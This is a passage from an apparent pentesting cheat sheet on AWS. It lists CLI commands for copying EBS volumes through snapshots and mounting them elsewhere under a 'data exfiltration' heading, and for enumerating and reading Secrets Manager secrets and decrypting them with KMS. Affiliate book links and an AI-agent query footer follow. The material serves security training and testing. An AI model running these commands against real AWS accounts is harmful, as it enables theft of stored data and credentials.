### Data Exfiltation Create a snapshot of the specified volume ``` aws ec2 create-snapshot --volume-id [volume-id] --description "exfiltration" ``` Describe all the available EBS snapshots ``` aws ec2 describe-snapshots --owner-ids self ``` Create a volume from snapshots ``` aws ec2 create-volume --snapshot-id [snapshot-id] --available-zone [available-zone] ``` Describe ec2 instances ``` aws ec2 describe-instances ``` Attach specified volume to the ec2-instance ``` aws ec2 attach-volume --volume-id [volume-id] --instance-id [instance-id] --device /dev/sdfd ``` Mount volume on EC2 file system ``` sudo mount /dev/sdfd /new_dir ``` See [Exploit snapshot](#exploit-snapshot) ## Secret Manager ### Enumeration List all secrets that are stored by Secrets Manager ``` aws secretsmanager list-secrets ``` Describe about a specified secret ``` aws secretsmanager describe-secret --secret-id [secret-name] ``` Resource-based policy attached to the specified secret ``` aws secretsmanager get-resource-policy --secret-id [secret-id] ``` #### Key Management Server, KMS All keys available in KMS ``` aws kms list-keys ``` Describe about a specified key ``` aws kms describe-key --key-id [key-id] ``` List of policies attached to specified key ``` aws kms list-key-policies --key-id [key-id] ``` Information about a policy ``` aws kms get-key-policy --policy-name [policy-name] --key-id [key-id] ``` ### Credential access #### Secret Manager ``` aws secretsmanager get-secret-value --secret-id [secret-id] ``` #### KMS Decrypt the encrypted secret by KMS key ``` aws kms decrypt --ciphertext-blob fileb://encrypted_file --output text --query Plaintext ``` ## Cloudtrail Read access aver Cloudtrail logs {% embed url="" %} ## Interesting Book {% content-ref url="../interesting-books" %} [interesting-books](https://0xss0rz.gitbook.io/0xss0rz/interesting-books) {% endcontent-ref %} {% hint style="info" %} **Disclaimer**: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you. {% endhint %} * [**Advanced Penetration Testing: Hacking AWS 2**](https://www.amazon.fr/dp/B0849Z2TLJ?tag=0xss0rz-21)\ This book delves deeper into analyzing the security of various AWS services and shows techniques and tactics used by an attacker to breach an AWS environment * [**Hands-On AWS Penetration Testing with Kali Linux**](https://www.amazon.fr/dp/B07C61YYJ4?tag=0xss0rz-21)\ Set up a virtual lab and pentest major AWS services, including EC2, S3, Lambda, and Cloud ## Resources {% embed url="" %} {% embed url="" %} {% embed url="" %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xss0rz.gitbook.io/0xss0rz/cloud/aws.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.